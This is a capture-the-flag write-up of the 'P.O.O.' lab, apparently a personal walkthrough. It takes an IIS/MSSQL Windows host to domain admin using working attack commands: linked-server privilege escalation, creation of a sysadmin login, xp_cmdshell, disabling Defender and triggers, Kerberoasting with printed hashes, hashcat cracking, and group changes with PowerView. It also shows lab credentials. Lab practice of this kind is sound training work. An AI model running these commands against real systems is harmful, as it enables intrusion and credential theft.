P.O.O

Entry Point

10.13.38.11

Lets start with our initial nmap scan

sudo nmap -p- --min-rate 1500 -T4 10.13.38.11 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the target machine 10.13.38.11

80,1433

Lets run a more in-depth scan of the target

sudo nmap -sCV -p80,1433 10.13.38.11 -oA 10.13.38.11_tcp

results

80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-info: 
|   10.13.38.11:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after:  2054-01-19T03:16:01
|_ssl-date: 2024-01-19T12:27:43+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

we can see

  • HTTP Microsoft IIS httpd 10.0 server

  • domain name intranet.poo we can add this to our hosts file

  • mssql server 2017

Lets check out the webserver

  • Looks like a default IIS server

Lets run feroxbuster and see if we can discover anything

feroxbuster -u http://intranet.poo -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o 10.13.38.11_dirs.txt -x asp,aspx

Lets check for any vhosts

wfuzz -c -f sub-fighter -u '10.13.38.11' -H 'Host:FUZZ.intranet.poo' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt | grep -v "703 Ch"
  • Nothing interesting

Lets run nikto to see if we can find any vulnerabilities

nikto --url http://intranet.poo
  • we do se somthing interesting

We can see the web server has a .DS_Store file withim the servers Root directory

what is a .DS_Store file ?

  • it is a hidden file that is automatically created by MacOS operating system when a user opens a folder with the Finder application. The file contains information about which files are in the folder and contains options such as what icons look like.

Why do we care?

here is a great blog that can explain that better then myself

We can utilize the following parser to enumerate the .DS_Store file

sudo python /opt/DS_Walk/ds_walk.py -u http://intranet.poo

results

[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://intranet.poo/admin
[!] http://intranet.poo/dev
[!] http://intranet.poo/iisstart.htm
[!] http://intranet.poo/Images
[!] http://intranet.poo/JS
[!] http://intranet.poo/META-INF
[!] http://intranet.poo/New folder
[!] http://intranet.poo/New folder (2)
[!] http://intranet.poo/Plugins
[!] http://intranet.poo/Templates
[!] http://intranet.poo/Themes
[!] http://intranet.poo/Uploads
[!] http://intranet.poo/web.config
[!] http://intranet.poo/Widgets
----------------------------
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://intranet.poo/Images/buttons
[!] http://intranet.poo/Images/icons
[!] http://intranet.poo/Images/iisstart.png
----------------------------
[!] http://intranet.poo/JS/custom
----------------------------
[!] http://intranet.poo/Themes/default
----------------------------
[!] http://intranet.poo/Widgets/CalendarEvents
[!] http://intranet.poo/Widgets/Framework
[!] http://intranet.poo/Widgets/Menu
[!] http://intranet.poo/Widgets/Notifications
----------------------------
[!] http://intranet.poo/Widgets/Framework/Layouts
----------------------------
[!] http://intranet.poo/Widgets/Framework/Layouts/custom
[!] http://intranet.poo/Widgets/Framework/Layouts/default
----------------------------

we can see a number of interesting entries such as dev and admin

we need a way of finding admins credentials

after some googling we do find this

essentialy we can utilize the "~" tilde to enumerate files and folders on the IIS server. we can use the tilde to discover the first six characters of files and folders along with there extension

we can utilize the following tool

shortscan http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db

results

We need to find the missing character we can use wfuzz for this

we can see the http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/ contains a file poo_co*.txt we need to find the rest of the filename

create a wordlist

grep '^co.*' /opt/

running wfuzz

wfuzz -c -u "http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt" -w ./fuzz.txt -t 20 --hc 404

we do find one 200 response

navigating to

we can see the following

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{flag}

Lets see if we can authenticate to the mssql server

sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py 'external_user:#p00Public3xt3rnalUs3r#@10.13.38.11'

first i want to see if ica n run commands with the xp_cmdshell

enable_xp_cmdshell
  • no luck

Lets conduct some basic enumeration

mssql version

select @@version;

List the databases

select name from master.dbo.sysdatabases;

current datebase

select db_name();
  • couldnt find anything to interesting

We could utilize a mssql server link and point it to an external source

  1. Lets find our current servers name

selectt @@servername
  1. we can check for linked servers, we can query the sysservers table

select srvname from sysservers;
  • we can see there is another linked remote server POO_CONFIG

we can utilize the EXECUTE to run queries on other servers

example

EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG]
  • after enumerating further there wasnt anything to interesting

Lets see if we can get POO_CONFIG to execute queries on POO_PUBLIC

EXECUTE ('EXECUTE (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
  • notice how the command ran as the 'sa' users, from what i can tell this is most likely a configuration issue, the issue resides in allowing any users on POO_PUBLIC the ability to run queries on POO_CONFIG as the internal users, but the second link looks like it allows any user from the POO_CONFIG to run queries as the 'sa' user

we can see when when we check our permissions through POO_CONFIG -> POO_PUBLIC

EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name                                                                                                                        permission_name                                                
--------------------------------------------------------------------------------------------------------------------------------   ------------------------------------------------------------   
server                                                                                                                             CONNECT SQL                                                    
server                                                                                                                             SHUTDOWN                                                       
server                                                                                                                             CREATE ENDPOINT                                                
server                                                                                                                             CREATE ANY DATABASE                                            
server                                                                                                                             CREATE AVAILABILITY GROUP                                      
server                                                                                                                             ALTER ANY LOGIN                                                
server                                                                                                                             ALTER ANY CREDENTIAL                                           
server                                                                                                                             ALTER ANY ENDPOINT                                             
server                                                                                                                             ALTER ANY LINKED SERVER                                        
server                                                                                                                             ALTER ANY CONNECTION                                           
server                                                                                                                             ALTER ANY DATABASE                                             
server                                                                                                                             ALTER RESOURCES                                                
server                                                                                                                             ALTER SETTINGS                                                 
server                                                                                                                             ALTER TRACE                                                    
server                                                                                                                             ALTER ANY AVAILABILITY GROUP                                   
server                                                                                                                             ADMINISTER BULK OPERATIONS                                     
server                                                                                                                             AUTHENTICATE SERVER                                            
server                                                                                                                             EXTERNAL ACCESS ASSEMBLY                                       
server                                                                                                                             VIEW ANY DATABASE                                              
server                                                                                                                             VIEW ANY DEFINITION                                            
server                                                                                                                             VIEW SERVER STATE                                              
server                                                                                                                             CREATE DDL EVENT NOTIFICATION                                  
server                                                                                                                             CREATE TRACE EVENT NOTIFICATION                                
server                                                                                                                             ALTER ANY EVENT NOTIFICATION                                   
server                                                                                                                             ALTER SERVER STATE                                             
server                                                                                                                             UNSAFE ASSEMBLY                                                
server                                                                                                                             ALTER ANY SERVER AUDIT                                         
server                                                                                                                             CREATE SERVER ROLE                                             
server                                                                                                                             ALTER ANY SERVER ROLE                                          
server                                                                                                                             ALTER ANY EVENT SESSION                                        
server                                                                                                                             CONNECT ANY DATABASE                                           
server                                                                                                                             IMPERSONATE ANY LOGIN                                          
server                                                                                                                             SELECT ALL USER SECURABLES                                     
server                                                                                                                             CONTROL SERVER      
  • we can see we have ALL the permissions

Lets create a new 'sa' user with a password so we dont have to keep relying on server links

  1. creating a user

EXECUTE('EXECUTE(''CREATE LOGIN shrek123 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
  1. giving our user the necassary permissions

EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''shrek123'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

Lets login via our newly created user

sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py 'shrek123:qwe123QWE!@#@10.13.38.11'
  • we are now logged in as a systems administrator

reading the flag

select name from master..sysdatabases;
select table_name,table_schema from flag.INFORMATION_SCHEMA.Tables;

Lets enable xp_cmdshell

enable_xp_cmdshell
xp_cmdshell whoami
  • Note: when we have triggers in place these are essentialy a policy put in place to alert and block attempts at certain actions such as enabling xp_cmdshell, these triggers reside in the sys.server_triggers

  • we can disable them by

disable trigger ALERT_xp_cmdshell on all servers

Now that we have command execution our next bet will be to estblish a revers-shell on the system

Lets check out the web.config file

xp_cmdshell type C:\inetpub\wwwroot\web.config

Alright i want to try and find a way to access this file

fun fact, when a webserver is enabled to run the stored procedure sp_execute_external_script, and that it is configured to do that as a different user, so lets try and use the this particular procedure to run a simple python script

execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("whoami");';

we can see this procedure is running under the user of poo_public01

Lets see if we can read the web.config file now

execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("type C:\inetpub\wwwroot\web.config");';

and we know have the contents of web.config file

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <staticContent>
            <mimeMap
                fileExtension=".DS_Store"
                mimeType="application/octet-stream"
            />
        </staticContent>
        <!--
        <authentication mode="Forms">
            <forms name="login" loginUrl="/admin">
                <credentials passwordFormat = "Clear">
                    <user 
                        name="Administrator" 
                        password="EverybodyWantsToWorkAtP.O.O."
                    />
                </credentials>
            </forms>
        </authentication>
        -->
    </system.webServer>
</configuration>

Lets try these creds at the /admin login prompt we found earlier

  • they work

  • i dont see a way in the terms of a foothold within this page, lets go back our mssql client and enumerate the machine further

execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("ipconfig");';

we do find an IPv6 address

dead:beef::1001

Lets see what nmap can find on this address

sudo nmap -A -6 -p- --min-rate 10000 dead:beef::1001

results

Host is up (0.30s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info: 
|   dead:beef::1001:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after:  2054-01-19T03:16:01
|_ssl-date: 2024-01-20T02:31:26+00:00; +2s from scanner time.
| ms-sql-info: 
|   dead:beef::1001:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s

TRACEROUTE
HOP RTT       ADDRESS
1   297.48 ms dead:beef::1001

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.85 seconds

we can see winrm is enabled, meaning we should be able to use evil-winrm and gain access to the machine

  • we need to add the the hostname and IP address to our hosts file

execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("hostname");';

COMPATIBILITY

Now we should be able to win-rm into the machine

evil-winrm -i COMPATIBILITY -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
  • it worked

Now we need to find a way of pivoting

we can upload SharpHound.exe via winrm, but try to execute the tool we encounter some problems, Since Administrator is not a domain account we cant query the domain, so we will run SharpHound.exe via our mssql client since we have access to a service account shrek123 we can impersonate a computer account which can query the domain

  1. upload SharpHound.exe via winrm

cd C:\Users\Public
upload SharpHound.exe
  1. execute SharpHound.exe via mssqlclient

xp_cmdshell C:\Users\Public\SharpHound.exe -C All --outputdirectory C:\Users\Public
  1. Now we can download the output zip file onto our local machine and ingest it to bllodhound

download 20240120055112_BloodHound.zip

Looking through bloodhound we can see within the built in query Shortest Paths to domain admins from kerberoastable users

we can see the user P00_ADM@INTRANET.POO is a member off the help desk and has GnericAll privileges on the Domain Admins group, meaning we can add any member to the Domain Admins group

  1. Lets perform some kerberoasting on the user P00_ADM@INTRANET.POO

  • we will utilize the Invoke-Kerberoast,ps1 script from

  • before we run the powershell script via winrm Lets turn off defender to be safe

Set-MpPreference -DisableRealTimeMonitoring $true
  • Now we can upload the script

upload Invoke-Kerberoast.ps1
  1. Now just like SharpHound we are going to utilize our mssqlclient session and execute the script

 xp_cmdshell powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat

results

output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               
NULL                                                                               
TicketByteHexStream  :                                                             
Hash                 : $krb5tgs$23$*p00_hr$intranet.poo$HR_peoplesoft/intranet.poo:1433*$EB1AEBE78B878A5F003B4181534EEB   
                       8E$486776D2198FDC0871DD2F27802D2F7B078EDDA8A080D3B7C7A459F5DBA2B071FBB3CA5D0817AD590C1C08EA372DE   
                       FB79E76D979DD39B9B209B33394D22F388EBA8F1FB28F4C883A4C394A72C230DCDFC0094EAF988CBCC6F3BDA0E98CF92   
                       5ED5DD3369C1488A8E85AE60E35A7EB80EF509653849DC1D276F924E1E72861E86B55F0A96AE7284D31A7435F9FF6D7F   
                       62C55C8C8B3041398BB1226E633AC663365188F131AB502D444A4DFB7FE2E6729AFBAC67618019B23835CC60BCC0A37C   
                       8FF2ABF381AED944618268A22133E78E10B656E4E2870CBF571D87338842AAC3DA2E1716A22532ABAC398329101A6DBA   
                       B625B754E293AF3CAEECB9949CF13F1DC35FD84E20CBB992E546289BF126E3C9BC513DB10D1D297DAAFA2FEBB905383F   
                       9C4F2686DAAEE3846B7623727C103668F75792766E8F008A9C049A99FBDAA540AD8610743B486C9C3C77EBDDDAFDC885   
                       27FCBAB63ABAB2C8E804B90DE973AC83F2CA3EC5B0FDEA8DED92E383A15DFB92FE9945505C22246776E611BD3BC6F061   
                       B4A66310E152EE51C6AB0028604F33EE94313CA0109B9B7DC16D6EE77A3B5021EF633D4E87F281F8BC055FD19DB37B02   
                       0158797221D6BD0794E5AA88DD524889C7FDB61581C927CB84D576C17FDDBFF0E54A4C0AF3322A3C5833478FBDB823F2   
                       5FA500D5044DC0F32F3EBAD797461625EAE3E96934505A259F0BC6F937A9FF53F05E7552587AE10F9E05E96A9C31231D   
                       E15F97166043AE950695E978A32E3F4AF543D691F60BC5D76ED546C2615A06206590535D1B0DE5A8D1F0F3E878194A8B   
                       F33ACECAC0331BD7CC7F9BB5D487D550A4B71FADBBFFE9B9908794BC73FE53A1800CB92F5375B72CC6DD2DC7DF19E1AC   
                       00AABB5A89B35BBB149329473369DEBA7B60CA05AC345327D7AE7E7004AB9C949BB99238FCD8A01B51A3E5FA01131170   
                       FA45604743F217EF518A3594DF05B89DD3F639BAF603E04E8D603414EAF181CA1F1B90AE03F31E997D504CA9BE0A727F   
                       44832AA4FA3B769995837151FC476D76FFFAAA7914B367A40E3F7F683C6159C540401DE3A7C2DA132F8FF6A029BA548C   
                       EF0456E941D8D64B4B2529E20DD87008044D320FDE3EB8AF1C638421AAB3DF883C3C7D389D9BB015811C77D5C05C8764   
                       25A32D4DD97DF8312C0DEE98A42D0476E9670E046E21055FE2AE979F8F37EEE52C0265160FFA290EFA0268521A76F46A   
                       35CB960DCB33F46C8BA5A5D23058AD1AE7501A0366E87870C7C487E43433C5872E6786EDCAEECC468E817685D6A5C485   
                       1622A629E8E2EE422AB305474216EF670677B27563EC9431EBC3F2B45295C3B847C0FD3F45BF8BEAE40DBFEE925BE046   
                       F4A7668D49A9E330C2B22ECD99D09333576DC510B99C3C9A3D2ACE5EB1AF4E5FFA7E1A0837D625BB08D2E35D2ED35F89   
                       2C0ECE21DC9A65A8A68892B581CC8BAA744F4081B4B00C2B08579526D162E4190C5B388350D9F3456D819207C2BDF   
SamAccountName       : p00_hr                                                      
DistinguishedName    : CN=p00_hr,CN=Users,DC=intranet,DC=poo                       
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433                             
NULL                                                                               
TicketByteHexStream  :                                                             
Hash                 : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$6531D8D31E5BCFC5A692FAC3B83B721C   
                       $48E4F730BF9D08D72F218B9764AA435DE18E1A130EC729FB616FEA77AE35322B34D8942B6AAB60D4546EA9B59CCAA30   
                       8AD57134EC5AF91337ED5B0A91BD390500444EED9164288986F8EB430A088F5EE66DDF275D607ADB279400E18F040C92   
                       C90FFDF849DACB340F645BA24871BB50142681DE34E8E9ED43C2DAE687ABA1203BB25B32058985AFC71871E3109656D8   
                       0F0C426AEA5DE1F68410F9A5EF7772C899A41CD3FF732FAE6DC7A0334DD102786B05C20CF92E5DE656DFF51DDA7F7081   
                       53E26B194CCFA90A7CF7446C56DD12548383EDA97266EAF17E6EC6B11C2E74598C43A76800D245E12BA4D8E116DC15FA   
                       B010F96C8BB827ABBA702EED1493A520E2B803EE23B5FCC802BE40B23EB1D97C64352F88556690C7B05C94D752C92118   
                       3AB83A62AFB19160C81A627A9D5C09277BCAE39240362FE00545E030CE9CFC3959021B472C7E9201533DE5D06624739B   
                       A9EA3EB87B0B47563D9BF097D3E52F09B13E6B8352728C75B23566ABFB23A7654749701FCE122EBEEC572DAF2C3C9496   
                       472345E78A4BC06263D124D7E7270E9AB1E23875E85C280D9A99222753F4E348DE0007E78D9F650F540E11C55C4EAA1D   
                       E9C15924C0A9A475CD0C9D5C5BF9CA8DF225E1E0E2AA56D7FA45C137209A8272FF177C21BEDBB58A153A810A056BD4E6   
                       F1C5D59832635779B257A49C3CB29199E60925012E8371715C96AD5F1A8BD4D2C559C07D51A08C44444E3870CCA5B3B4   
                       642987C8ABE1DCC028E4949A8D3CE4F16C4C5D3B387078299E259FFB61CECEDD16508E6554B299C290850903872AED0F   
                       D3AC11E5CDD86D7FF9DB3D19D190FD78335D716CD753DD50A7F2DDAAC35F04684599823BFD5D4D10B1A71A8033C7B7F2   
                       A2737AA9BD9BA79533C45D494E21DFE89DEDCDFB427E1E6E0F72C61711D81392677B5C5A4D1C0345E81B9EA03F632774   
                       A0485250498C88A1B53ED1130C7CA17A0BE9CC797D6B88B5EE493735921AC563A11E76A28870550ACAA5EA7BE9D23C2F   
                       F7C3074BD61BD0FD995753A17480A1814D394D3E24023B0307A49440CC79747F2AEED98ABD84816A94DEEC9587E4B098   
                       5DE77784D8520AD5DA7460FF3DE26336401E49F689E3338FD0857CBFEAF251357E20A64AD68EB98B713451EA752147F4   
                       1E4ED4307BE0B09BF4865A9B7EC931BCCCB9B7129E7E87E03AEDB73401F34E5101B2D380799EFE41EDB9298403D30218   
                       F043DD3283DD801946BF09F163E37F0EF969F8FEFAAE2FA8975FF646613FF6F653F78C467BC45BC05D268B4EFEF5D62C   
                       CD0F0B096690C315523798A78030EFA3519B78D55181FE9932A58EC346230A56D36AC4EFE6D8B546C9C4A51E8DF06206   
                       EE3FE67770E351CA2894E3FCFCC4ACFB89CD8A2C43CEF8E6AB0DECBBDEF560261A2A59A523A0DA23E948B659CC3C4C0B   
                       8F6445A7ABC4ED14D4E3B7FFBB117573D1D5F02010BD3B3F0EF0A36DCE9CBE32AA862E1A5E35825FD3A530014E9   
SamAccountName       : p00_adm                                                     
DistinguishedName    : CN=p00_adm,CN=Users,DC=intranet,DC=poo                      
ServicePrincipalName : cyber_audit/intranet.poo:443                                
NULL                                                                               
NULL                                                                               
NULL                                                                               
NULL
  • we can see two account have returned a hash, lets utilize hashcatt and crack these

  • To help clean the hash and get it ready for cracking

cat poo | tr -d '[:space:']
  • tried to crack theb hashes but no luck, maybe the hash broke somehow

Now we can crack it using hashcat

hashcat -m 13100 hash /usr/share/wordlists/seclists/SecLists-master/Passwords/Keyboard-Combinations.txt --force
  • we had to try a few different wordlists but eventually found it

creds

p00_adm: ZQ!5t4r

Now we can use p00_adm's account and add it to the Domain admins group, then we can upload PowerView.ps1

  1. Lets upload PowerView.ps1 via winrm, and import the module

upload PowerView.ps1
import-module .\PowerView.ps1
  1. Lets create a PS credential

$Pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $Pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred

Now that p00_adm is part of the domain admins group, we can use the account to access the c$ share on the DC

 net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
dir \\DC.intranet.poo\c$\users\

Last updated